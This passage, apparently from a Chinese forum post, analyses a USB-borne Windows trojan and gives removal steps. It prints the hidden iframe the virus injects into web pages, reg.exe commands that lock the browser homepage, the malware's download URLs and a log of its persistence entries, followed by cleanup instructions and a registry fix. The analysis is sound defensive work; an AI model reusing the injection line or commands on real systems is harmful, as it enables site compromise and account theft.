不光劫持常見(jiàn)殺毒軟件和小工具 還劫持了msconfig.exe regedit.exe等系統(tǒng)常用的輔助工具
4.遍歷各個(gè)分區(qū)刪除.GHO文件
5.遍歷各個(gè)分區(qū)的INDEX.ASP，.HTM，INDEX.PHP，DEFAULT.ASP，DEFAULT.PHP，CONN.ASP文件
在其后面加入<IfrAmE src=http://www.1030829.com/0.htm width=0 
height=0></IfrAmE>的代碼
連接網(wǎng)絡(luò)
6.連接hxxp://www.1030829.com/pu/tj.asp做感染統(tǒng)計(jì)
7.下載hxxp://*.1030829.com/guanjian.txt到%system32%\text1.txt
讀取里面的文件內(nèi)容
并通過(guò)GetWindowTextA等函數(shù)獲得窗口名稱(chēng) 調(diào)用PostMessageA發(fā)送WM_CLOSE命令
關(guān)閉帶有text1.txt中所包含的關(guān)鍵字的窗口
測(cè)試中text1.txt內(nèi)容如下
木馬
病毒
360
瑞星
卡吧
金山
毒霸
江名
8.下載hxxp://*.1030829.com/suoding.txt到%system32%\d.txt
讀取里面的內(nèi)容（里面是一個(gè)網(wǎng)址）
并通過(guò)調(diào)用reg.exe 執(zhí)行
add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d
的命令 把IE首頁(yè)修改成d.txt中的地址
add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f         鎖定IE主頁(yè)
測(cè)試中suoding.txt中的內(nèi)容為www.baidu.com （肯定以后還會(huì)變化）
9.下載http://*.1030829.com/down.txt到%system32%文件夾下
讀取里面的地址下載木馬
http://*.1030829.com/tempA.exe~http://w.1030829.com/tempW.exe
到%system32%文件夾下
盜號(hào)木馬會(huì)盜取包括如下游戲的帳號(hào)和密碼（包括但不限于）
刀劍
魔獸世界
奇跡世界
完美世界
大話西游II
魔域
問(wèn)道
誅仙
熱血江湖
QQ
...
木馬植入完畢以后的sreng日志如下
啟動(dòng)項(xiàng)目
注冊(cè)表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
              <crsss><C:\WINDOWS\system32\crsss.exe>         [N/A]
           <upxdnd><C:\WINDOWS\upxdnd.exe>         []
           <KVP><C:\WINDOWS\system32\drivers\svchost.exe>         []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows 
NT\CurrentVersion\Windows]
           <AppInit_DLLs><rarjbpi.dll>         []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows 
NT\CurrentVersion\Winlogon]
           <UIHost><logonui.exe>         [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerShellExecuteHooks]
           <{4D47B341-43DF-4563-753F-345FFA3157D4}><C:\WINDOWS\system32
\kvmxdma.dll>         []
           <{3E32FA58-3453-FA2D-BC49-F340348ACCE3}><C:\WINDOWS\system32
\rsmycpm.dll>         []
           <{3C87A354-ABC3-DEDE-FF33-3213FD7447C3}><C:\WINDOWS\system32
\kvdxcma.dll>         []
           <{3A1247C1-53DA-FF43-ABD3-345F323A48D3}><C:\WINDOWS\system32
\avwgcmn.dll>         []
           <{46650011-3344-6688-4899-345FABCD1564}><C:\WINDOWS\system32
\ratbdpi.dll>         []
           <{14783410-4F90-34A0-7820-3230ACD05F41}><C:\WINDOWS\system32
\raqjapi.dll>         []
           <{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}><C:\WINDOWS\system32
\rsjzbpm.dll>         []
           <{4859245F-345D-BC13-AC4F-145D47DA34F4}><C:\WINDOWS\system32
\avzxdmn.dll>         []
           <{28907901-1416-3389-9981-372178569982}><C:\WINDOWS\system32
\kawdbzy.dll>         []
           <{2598FF45-DA60-F48A-BC43-10AC47853D52}><C:\WINDOWS\system32
\rarjbpi.dll>         []
           <{1AB09B3F-A6D0-4B55-B87D-264934EBEAED}><C:\Program Files\Internet 
Explorer\PLUGINS\WinSys74.Sys>         []
           <{A393C2CF-1C26-4309-9765-13B7FDC0F200}><C:\WINDOWS\system32
\mypern0.dll>         []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution Options\360rpt.exe]
           <IFEO[360rpt.exe]><C:\WINDOWS\system32\crsss.exe>         [N/A]...
==================================
服務(wù)
[Windows dvne RunThem / dvne][Running/Auto Start]
         <C:\WINDOWS\System32\svchost.exe -k netsvcs-->C:\PROGRA~1
\yqiz\iasj.dll><>
==================================
驅(qū)動(dòng)程序
[acpidisk / acpidisk][Running/Auto Start]
         <\??\C:\WINDOWS\system32\drivers\acpidisk.sys><N/A>
==================================
正在運(yùn)行的進(jìn)程
[PID: 1756][C:\WINDOWS\Explorer.EXE]         [Microsoft Corporation, 
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
           [C:\WINDOWS\system32\rarjbpi.dll]         [N/A, ]
           [C:\WINDOWS\system32\kvmxdma.dll]         [N/A, ]
           [C:\WINDOWS\system32\rsmycpm.dll]         [N/A, ]
           [C:\WINDOWS\system32\kvdxcma.dll]         [N/A, ]
           [C:\WINDOWS\system32\avwgcmn.dll]         [N/A, ]
           [C:\WINDOWS\system32\ratbdpi.dll]         [N/A, ]
           [C:\WINDOWS\system32\raqjapi.dll]         [N/A, ]
           [C:\WINDOWS\system32\rsjzbpm.dll]         [N/A, ]
           [C:\WINDOWS\system32\avzxdmn.dll]         [N/A, ]
           [C:\WINDOWS\system32\kawdbzy.dll]         [N/A, ]
           [C:\Program Files\Internet Explorer\PLUGINS\WinSys74.Sys]         [N/A, ]
           [C:\WINDOWS\system32\mypern0.dll]         [N/A, ]
           [C:\WINDOWS\system32\upxdnd.dll]         [N/A, ]
           [c:\progra~1\yqiz\ldvm.dll]         [, 5, 0, 1, 1]
           [c:\progra~1\yqiz\qiar.dll]         [, 5, 0, 1, 1]
==================================
Winsock 提供者
MSAPI Tcpip [TCP/IP]
           C:\WINDOWS\system32\msavp.dll(, N/A)
MSAPI Tcpip [UDP/IP]
           C:\WINDOWS\system32\msavp.dll(, N/A)
...
清除辦法：

一、清除病毒主程序
下載sreng2.zip和IceSword120_cn.zip(以下簡(jiǎn)稱(chēng)冰刃)


1.解壓IceSword122cn.zip把Icesword.exe改名為1.com
運(yùn)行 切換到進(jìn)程窗口
結(jié)束%system32%\crsss.exe進(jìn)程 （注意是crsss.exe不是csrss.exe，一定不要搞
錯(cuò)）


2.點(diǎn)擊左下角文件按鈕 刪除如下文件
%system32%\crsss.exe
和每個(gè)分區(qū)下的niu.exe和autorun.inf（一定不要落下這一步）



二、修復(fù)被病毒破壞的系統(tǒng)
1.打開(kāi)sreng
啟動(dòng)項(xiàng)目         注冊(cè)表
刪除所有紅色的IFEO映像劫持項(xiàng)目
并刪除
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]下的
              <crsss><C:\WINDOWS\system32\crsss.exe>         [N/A]
2.還是sreng中 
系統(tǒng)修復(fù)-Windows Shell/IE
勾選如下項(xiàng)目
允許在Windows 2000/XP/Server 2003中使用任務(wù)管理器
設(shè)置主頁(yè)為"about:blank"
允許Internet Explorer選項(xiàng)窗口和選項(xiàng)窗口的所有內(nèi)容
然后點(diǎn)擊修復(fù)
3.sreng中
系統(tǒng)修復(fù)-高級(jí)修復(fù)
修復(fù)安全模式
4.找一臺(tái)未被感染病毒的與中毒電腦系統(tǒng)相同的電腦 導(dǎo)出未中毒電腦的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\A
dvanced\Folder\Hidden整個(gè)鍵的內(nèi)容
并在中毒電腦中導(dǎo)入
XP系統(tǒng)可以把下列文字拷入記事本 然后重命名為1.reg 雙擊導(dǎo)入注冊(cè)表

Quote:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerAdvanced\Folder\Hidden]
"Text"="@shell32.dll,-30499"
"Type"="group"
"Bitmap"=hex
(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,  
00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,53
,00,  
48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,34,00
,00,         00
"HelpID"="shell.hlp#51131"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerAdvanced\Folder\Hidden\NOHIDDEN]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Adva
nced"
"Text"="@shell32.dll,-30501"
"Type"="radio"
"CheckedValue"=dword:00000002
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51104"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerAdvanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Adva
nced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

三、清除病毒下載的木馬（由于下載的木馬隨時(shí)變化，所以本文中的方法僅供參
考）

1.首先重命名如下文件

Quote:
C:\WINDOWS\system32\kvmxdma.dll
C:\WINDOWS\system32\rsmycpm.dll
C:\WINDOWS\system32\kvdxcma.dll
C:\WINDOWS\system32\avwgcmn.dll
C:\WINDOWS\system32\ratbdpi.dll
C:\WINDOWS\system32\raqjapi.dll
C:\WINDOWS\system32\rsjzbpm.dll
C:\WINDOWS\system32\avzxdmn.dll
C:\WINDOWS\system32\kawdbzy.dll
C:\WINDOWS\system32\rarjbpi.dll
C:\WINDOWS\system32\mypern0.dll

（這些是前面分析過(guò)的隨機(jī)7位dll木馬，用重命名大法清除）
2.打開(kāi)sreng 
“啟動(dòng)項(xiàng)目”-“服務(wù)”-“Win32服務(wù)應(yīng)用程序”中點(diǎn)“隱藏經(jīng)認(rèn)證的微軟項(xiàng)目”
，選中以下項(xiàng)目，點(diǎn)“刪除服務(wù)”，再點(diǎn)“設(shè)置”，在彈出的框中點(diǎn)“否”：
Windows dvne RunThem / dvne

在“啟動(dòng)項(xiàng)目”-“服務(wù)”-“驅(qū)動(dòng)程序”中點(diǎn)“隱藏經(jīng)認(rèn)證的微軟項(xiàng)目”，
選中以下項(xiàng)目，點(diǎn)“刪除服務(wù)”，再點(diǎn)“設(shè)置”，在彈出的框中點(diǎn)“否”：
acpidisk / acpidisk
系統(tǒng)修復(fù) 高級(jí)修復(fù) 
重置winsock

3.重啟計(jì)算機(jī)
雙擊我的電腦，工具，文件夾選項(xiàng)，查看，單擊選取"顯示隱藏文件或文件夾" 并
清除"隱藏受保護(hù)的操作系統(tǒng)文件（推薦）"前面的鉤。在提示確定更改時(shí)，單擊
“是” 然后確定
刪除如下文件

Quote:
C:\WINDOWS\system32\drivers\svchost.exe
C:\WINDOWS\system32\msavp.dll
C:\WINDOWS\upxdnd.exe
C:\WINDOWS\system32\drivers\acpidisk.sys
c:\progra~1\yqiz文件夾
以及你剛重命名的
C:\WINDOWS\system32\kvmxdma.dll
C:\WINDOWS\system32\rsmycpm.dll
C:\WINDOWS\system32\kvdxcma.dll
C:\WINDOWS\system32\avwgcmn.dll
C:\WINDOWS\system32\ratbdpi.dll
C:\WINDOWS\system32\raqjapi.dll
C:\WINDOWS\system32\rsjzbpm.dll
C:\WINDOWS\system32\avzxdmn.dll
C:\WINDOWS\system32\kawdbzy.dll
C:\WINDOWS\system32\rarjbpi.dll
C:\WINDOWS\system32\mypern0.dll

四、使用工具修復(fù)受感染的htm等網(wǎng)頁(yè)文件
最后再次提醒大家一定要關(guān)閉電腦的自動(dòng)播放功能，不要讓此類(lèi)惡性U盤(pán)病毒再如
此肆意傳播了！
也跟病毒作者說(shuō)一句話，你那句話以后應(yīng)該改為“禽獸尚且有半點(diǎn)憐憫之心,而我
一點(diǎn)沒(méi)有,所以我禽獸不如?。?！”

最新評(píng)論